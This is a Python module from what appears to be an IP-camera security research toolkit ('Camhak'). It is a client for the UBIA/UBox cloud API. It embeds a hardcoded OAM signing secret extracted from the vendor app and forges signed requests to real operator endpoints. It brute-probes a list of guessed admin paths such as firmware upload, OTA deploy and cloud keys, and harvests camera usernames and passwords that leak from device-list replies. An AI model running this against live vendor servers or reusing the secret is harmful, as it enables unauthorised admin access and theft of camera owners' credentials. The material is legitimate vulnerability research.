Original tooling from the Camhak research project (camera teardown of a
rebranded UBIA / Javiscam IP camera). PyQt6 GUI on top of a curses TUI on
top of a service controller; per-service start/stop, intruder detection,
protocol fingerprinting, OAM HMAC signing, CVE verifiers, OTA bucket
probe, firmware fetcher, fuzzer, packet injection.
Tabs: Dashboard, Live Log, Intruders, Cloud API, Fuzzer, Inject, CVEs,
Config, Help. Real-time per-packet protocol detection, conntrack-based
original-destination lookup, log rotation at 1 GiB.
See SECURITY_PAPER.md for the full writeup, site/index.html for the
public report, README.md for usage. Run with:
sudo /usr/bin/python3 gui.py
Co-authored by Setec Labs.
258 lines · 9.5 KiB · Python
"""UBox cloud API client — authenticate, list devices, check firmware, etc."""
|
|
|
|
import hashlib
|
|
import hmac
|
|
import base64
|
|
import json
|
|
import time
|
|
import urllib.request
|
|
import urllib.error
|
|
from utils.log import log, C_SUCCESS, C_ERROR, C_INFO, C_TRAFFIC, C_IMPORTANT
|
|
|
|
|
|
# ─── OAM (operator/admin) endpoint signing ───────────────────────
# Identity values sent in the OAM-APPID / CLIENT-ID request headers.
OAM_APPID = "30001"
OAM_CLIENT_ID = ""  # empty in app code; may need to be set per-deployment

# Hardcoded secret extracted from com/http/OamHttpClient.java:28
OAM_SECRET = "2894df25f8f740dff5266bc155c662ca"

# Known OAM API roots, in the order they are tried.
OAM_BASE_URLS = [
    "https://oam.ubianet.com/api",
    "https://dev.ubianet.com/oam/api",
]
|
|
|
|
|
|
def oam_sign(body_str, ts_ms, appid=OAM_APPID, client_id=OAM_CLIENT_ID,
             secret=OAM_SECRET):
    """
    Compute an OAM request signature the way com.http.Encryption.Hmac does.

    The signed message is "<ts>:<appid>:<clientId>:<body>" encoded as UTF-8,
    keyed with the UTF-8 bytes of `secret`, using HMAC-SHA1.

    Returns the digest as a hex string.
    """
    message = "{}:{}:{}:{}".format(ts_ms, appid, client_id, body_str)
    key = secret.encode("utf-8")
    mac = hmac.new(key, message.encode("utf-8"), hashlib.sha1)
    return mac.hexdigest()
|
|
|
|
|
|
def oam_post(endpoint, data, base_url=None):
    """
    POST `data` as JSON to an OAM endpoint with the OAM signing headers set.

    Args:
        endpoint: path appended to each base URL as "<base>/<endpoint>".
        data: JSON-serialisable request body.
        base_url: when given, only this base is tried; otherwise every
            entry of OAM_BASE_URLS is tried in order.

    Returns:
        The decoded JSON payload of the first base that answers without an
        error. If every base fails, a dict describing the LAST failure:
        {"error": <HTTP status int>, "body": <text>, "base": <base>} for an
        HTTP error, or {"error": <message str>, "base": <base>} for any
        other exception (including a malformed URL).
    """
    body = json.dumps(data).encode("utf-8")
    body_str = body.decode("utf-8")
    ts_ms = str(int(time.time() * 1000))
    # Pass the current module values explicitly: oam_sign's defaults were
    # bound when it was defined, while the headers below read the globals
    # now. Signing with the same values keeps signature and headers in sync.
    sign = oam_sign(body_str, ts_ms, OAM_APPID, OAM_CLIENT_ID, OAM_SECRET)

    headers = {
        "Content-Type": "application/json",
        "OAM-SIGN": sign,
        "OAM-APPID": OAM_APPID,
        "CLIENT-ID": OAM_CLIENT_ID,
        "timestamp": ts_ms,
        "X-UbiaAPI-CallContext": "source=app&app=ubox&ver=1.1.360&osver=14",
    }

    bases = [base_url] if base_url else OAM_BASE_URLS
    last_err = None
    for b in bases:
        url = f"{b}/{endpoint}"
        log(f"OAM: POST {url}", C_INFO)
        # Show the string that was actually signed, client id included
        # (identical to the old output while the client id is empty).
        log(f" sign-str = {ts_ms}:{OAM_APPID}:{OAM_CLIENT_ID}:{body_str[:80]}", C_INFO)
        log(f" OAM-SIGN = {sign}", C_INFO)
        try:
            # Request() raises ValueError on a malformed URL; building it
            # inside the try lets that fall through to the next base
            # instead of aborting the whole call.
            req = urllib.request.Request(url, data=body, method="POST", headers=headers)
            with urllib.request.urlopen(req, timeout=15) as resp:
                payload = json.loads(resp.read().decode("utf-8"))
                log(f"OAM: {json.dumps(payload, indent=2)[:400]}", C_TRAFFIC)
                return payload
        except urllib.error.HTTPError as e:
            body_text = e.read().decode("utf-8", errors="replace")[:400]
            log(f"OAM: HTTP {e.code} from {b}: {body_text}", C_ERROR)
            last_err = {"error": e.code, "body": body_text, "base": b}
        except Exception as e:
            log(f"OAM: error from {b}: {e}", C_ERROR)
            last_err = {"error": str(e), "base": b}
    return last_err or {"error": "all OAM bases failed"}
|
|
|
|
|
|
def oam_fuzz(endpoints):
    """
    Probe candidate OAM endpoints with empty bodies and report which ones
    return a non-404 response (i.e. exist).

    Args:
        endpoints: iterable of endpoint paths, each passed to oam_post().

    Returns:
        A dict with:
          "hits"   - one entry per endpoint that produced a response other
                     than HTTP 404: either {"endpoint", "error", "body"}
                     for a non-404 HTTP error, or {"endpoint", "code",
                     "msg", "data"} for a decoded JSON payload.
          "404s"   - number of endpoints answered with HTTP 404.
          "errors" - number of endpoints that failed with anything else
                     (HTTP error or transport failure).
          "tried"  - number of endpoints attempted.
    """
    results = {"hits": [], "404s": 0, "errors": 0, "tried": 0}
    for ep in endpoints:
        results["tried"] += 1
        r = oam_post(ep, {})
        err = r.get("error") if isinstance(r, dict) else None
        if err == 404:
            results["404s"] += 1
        elif err is not None:
            results["errors"] += 1
            # oam_post reports HTTP failures with the integer status code
            # and everything else (DNS, timeout, bad URL, ...) with a
            # message string. Only the former means a server answered, so
            # only those count as hits.
            if isinstance(err, int):
                results["hits"].append({"endpoint": ep, "error": err,
                                        "body": r.get("body", "")[:200]})
        else:
            # Real JSON came back (msg=success or msg=fail with code).
            # A non-object payload (list, string, null) still proves the
            # endpoint exists, so it is recorded rather than dropped.
            if isinstance(r, dict):
                code, msg, data = r.get("code"), r.get("msg"), r.get("data")
            else:
                code, msg, data = None, None, r
            results["hits"].append({"endpoint": ep,
                                    "code": code,
                                    "msg": msg,
                                    "data": data})
            log(f"OAM-FUZZ: ✓ {ep} -> code={code} msg={msg}",
                C_IMPORTANT)
    log(f"OAM-FUZZ done: {len(results['hits'])} hits / {results['tried']} tried "
        f"({results['404s']} 404s, {results['errors']} errors)", C_SUCCESS)
    return results
|
|
|
|
|
|
# Candidate OAM endpoints — confirmed in source + admin guesses
OAM_ENDPOINT_GUESSES = [
    # Confirmed in OamHttpClient.java
    "lgc/bind_err",
    "app/push_channel_reg",
    # Common admin patterns to probe: "oam/"-prefixed
    "oam/users",
    "oam/user/list",
    "oam/user/info",
    "oam/devices",
    "oam/device/list",
    "oam/device/info",
    "oam/firmware",
    "oam/firmware/list",
    "oam/firmware/upload",
    "oam/ota",
    "oam/ota/list",
    "oam/ota/deploy",
    "oam/ota/push",
    "oam/config",
    "oam/cloud/config",
    "oam/cloud/keys",
    "oam/stats",
    "oam/dashboard",
    "oam/system",
    "oam/logs",
    "oam/audit",
    "oam/security",
    # Same resources without the prefix
    "user/list",
    "user/info",
    "user/all",
    "device/list",
    "device/info",
    "device/all",
    "firmware/list",
    "firmware/all",
    "firmware/latest",
    "ota/list",
    "ota/all",
    "ota/deploy",
    # "admin/"-prefixed
    "admin/users",
    "admin/devices",
    "admin/firmware",
    "admin/config",
    "admin/system",
    "admin/stats",
    # Generic status pages
    "stats",
    "dashboard",
    "system/info",
    "system/version",
    # Siblings of the two confirmed endpoints
    "lgc/bind_ok",
    "lgc/list",
    "lgc/info",
    "app/version",
    "app/config",
    # Push service
    "push/list",
    "push/send",
    "push/all",
]
|
|
|
|
|
|
|
|
def hash_password(password):
    """
    Hash a plaintext password into the form sent in the login request.

    The result is the HMAC-SHA1 of the UTF-8 password under an EMPTY key,
    Base64-encoded with "+" -> "-", "/" -> "_" and "=" padding -> ",".
    """
    mac = hmac.new(b"", password.encode("utf-8"), hashlib.sha1)
    # urlsafe_b64encode already performs the "+" -> "-" and "/" -> "_" swap.
    encoded = base64.urlsafe_b64encode(mac.digest()).decode("utf-8")
    return encoded.replace("=", ",")
|
|
|
|
|
|
def api_post(base_url, endpoint, data, token=None):
    """
    POST `data` as JSON to "<base_url>/<endpoint>" and decode the JSON reply.

    Args:
        base_url: API root, e.g. the configured "api_base".
        endpoint: path appended to the base URL.
        data: JSON-serialisable request body.
        token: optional user token, sent as X-Ubia-Auth-UserToken.

    Returns:
        The decoded JSON reply on success. This function never raises for
        request failures; instead it returns
        {"error": <HTTP status int>, "body": <first 500 chars>} for an HTTP
        error, or {"error": <message str>} for any other failure, including
        a malformed URL or an unserialisable body.
    """
    url = f"{base_url}/{endpoint}"
    try:
        # Serialising the body and building the Request can both raise
        # (TypeError for unserialisable data, ValueError for a URL without
        # a scheme, e.g. an empty api_base). Keeping them inside the try
        # means callers always get the error dict they check for.
        body = json.dumps(data).encode("utf-8")
        req = urllib.request.Request(url, data=body, method="POST")
        req.add_header("Content-Type", "application/json")
        req.add_header("X-UbiaAPI-CallContext", "source=app&app=ubox&ver=1.1.360&osver=14")
        if token:
            req.add_header("X-Ubia-Auth-UserToken", token)
        with urllib.request.urlopen(req, timeout=15) as resp:
            return json.loads(resp.read().decode("utf-8"))
    except urllib.error.HTTPError as e:
        return {"error": e.code, "body": e.read().decode("utf-8", errors="replace")[:500]}
    except Exception as e:
        return {"error": str(e)}
|
|
|
|
|
|
def login(cfg):
    """
    Log in to the cloud API and store the returned user token in `cfg`.

    Reads cfg["api_email"], cfg["api_password"] and cfg["api_base"]. On
    success writes cfg["api_token"] and calls cfg.save().

    Returns:
        True when the server answered msg == "success" AND supplied a
        token in data.Token; False otherwise (missing credentials, request
        failure, or a reply that lacks the token).
    """
    if not cfg["api_email"] or not cfg["api_password"]:
        log("API: set api_email and api_password first", C_ERROR)
        return False
    hashed = hash_password(cfg["api_password"])
    data = {
        "account": cfg["api_email"], "password": hashed,
        "app": "ubox", "app_version": "1.1.360",
        "device_type": 1, "lang": "en", "brand": "Python",
        "device_token": "none", "regid_jg": "fail",
        "regid_xm": "fail", "regid_vivo": "fail",
    }
    log(f"API: logging in as {cfg['api_email']}...", C_INFO)
    result = api_post(cfg["api_base"], "v3/login", data)

    # The reply is decoded JSON of unknown shape: it may not be an object,
    # and a "success" message does not guarantee data.Token is present.
    # Treat anything without a usable token as a failed login instead of
    # raising KeyError/TypeError/AttributeError.
    payload = result.get("data") if isinstance(result, dict) else None
    token = payload.get("Token") if isinstance(payload, dict) else None
    succeeded = isinstance(result, dict) and result.get("msg") == "success"
    if not (succeeded and token):
        log(f"API: login failed: {json.dumps(result)[:200]}", C_ERROR)
        return False

    cfg["api_token"] = token
    log(f"API: login OK — token={str(token)[:20]}...", C_SUCCESS)

    # The login reply may carry an app_config section; only its presence
    # is reported here, nothing from it is stored.
    if payload.get("app_config", {}):
        log("API: leaked app_config keys extracted", C_IMPORTANT)

    cfg.save()
    return True
|
|
|
|
|
|
def devices(cfg):
    """
    Fetch the account's device list and log one line per device.

    Requires cfg["api_token"]. For every device that carries both
    "cam_user" and "cam_pwd", the device UID and those credentials are
    copied into cfg (device_uid / device_cam_user / device_cam_pwd); when
    several devices qualify the last one wins. cfg.save() is called once
    if anything was captured.

    Returns:
        The list of device dicts from the reply, or [] when not logged in,
        when the request failed, or when the reply has no usable "data".
    """
    if not cfg["api_token"]:
        log("API: login first", C_ERROR)
        return []
    result = api_post(cfg["api_base"], "user/device_list", {}, cfg["api_token"])

    # Guard against replies that are not objects or that say "success"
    # without a "data" object; indexing those used to raise.
    payload = result.get("data") if isinstance(result, dict) else None
    if not (isinstance(payload, dict) and result.get("msg") == "success"):
        log(f"API: {json.dumps(result)[:300]}", C_ERROR)
        return []

    # "or []" also covers an explicit null in the reply.
    devs = payload.get("list") or []
    fw = payload.get("firmware_ver", [])
    log(f"API: {len(devs)} device(s), firmware: {fw}", C_SUCCESS)

    captured = False
    for d in devs:
        uid = d.get("device_uid", "?")
        name = d.get("name", "?")
        cu = d.get("cam_user", "")
        cp = d.get("cam_pwd", "")
        model = d.get("model_num", "?")
        bat = d.get("battery", "?")
        log(f" [{uid}] {name} model={model} bat={bat}%", C_TRAFFIC)
        if cu and cp:
            log(f" LEAKED CREDS: {cu} / {cp}", C_IMPORTANT)
            # NOTE(review): the nesting of these assignments and of the
            # save was reconstructed from flattened source; they are
            # assumed to belong to this branch — confirm against upstream.
            cfg["device_uid"] = uid
            cfg["device_cam_user"] = cu
            cfg["device_cam_pwd"] = cp
            captured = True
    if captured:
        cfg.save()
    return devs
|
|
|
|
|
|
def check_firmware(cfg):
    """
    Call the check_version/v3 endpoint for the configured device.

    Needs cfg["api_token"] and cfg["device_uid"]; logs an error and returns
    None when either is missing. Host and wifi versions are reported as
    "0.0.0.1". The full reply is logged and returned unchanged.
    """
    if not (cfg["api_token"] and cfg["device_uid"]):
        log("API: login and get devices first", C_ERROR)
        return None
    query = {
        "device_uid": cfg["device_uid"],
        "host_version": "0.0.0.1",
        "wifi_version": "0.0.0.1",
        "is_lite": False,
        "zone_id": 2,
    }
    reply = api_post(cfg["api_base"], "user/qry/device/check_version/v3",
                     query, cfg["api_token"])
    pretty = json.dumps(reply, indent=2)
    log(f"API firmware: {pretty}", C_TRAFFIC)
    return reply
|
|
|
|
|
|
def device_services(cfg):
    """
    Call the device_services endpoint for the configured device.

    Needs cfg["api_token"] and cfg["device_uid"]; logs an error and returns
    None when either is missing. The first 600 characters of the reply are
    logged; the reply itself is returned unchanged.
    """
    if not (cfg["api_token"] and cfg["device_uid"]):
        log("API: login and get devices first", C_ERROR)
        return None
    query = {"device_uid": cfg["device_uid"]}
    reply = api_post(cfg["api_base"], "user/qry/device/device_services",
                     query, cfg["api_token"])
    preview = json.dumps(reply, indent=2)[:600]
    log(f"API services: {preview}", C_TRAFFIC)
    return reply
|
|
|
|
|
|
def raw_request(cfg, endpoint, data=None):
    """
    Send an authenticated POST to an arbitrary API endpoint.

    Needs cfg["api_token"]; logs an error and returns None without it.
    A missing or empty `data` is sent as an empty JSON object. The first
    800 characters of the reply are logged; the reply is returned as-is.
    """
    token = cfg["api_token"]
    if not token:
        log("API: login first", C_ERROR)
        return None
    log(f"API: POST {endpoint}", C_INFO)
    payload = data if data else {}
    reply = api_post(cfg["api_base"], endpoint, payload, cfg["api_token"])
    preview = json.dumps(reply, indent=2)[:800]
    log(f"API: {preview}", C_TRAFFIC)
    return reply
|
|
|
|
|
|
def families(cfg):
    """POST an empty body to "user/families" via raw_request and return its reply."""
    endpoint = "user/families"
    return raw_request(cfg, endpoint)
|
|
|
|
|
|
def device_list_v2(cfg):
    """POST an empty body to "v2/user/device_list" via raw_request and return its reply."""
    endpoint = "v2/user/device_list"
    return raw_request(cfg, endpoint)
|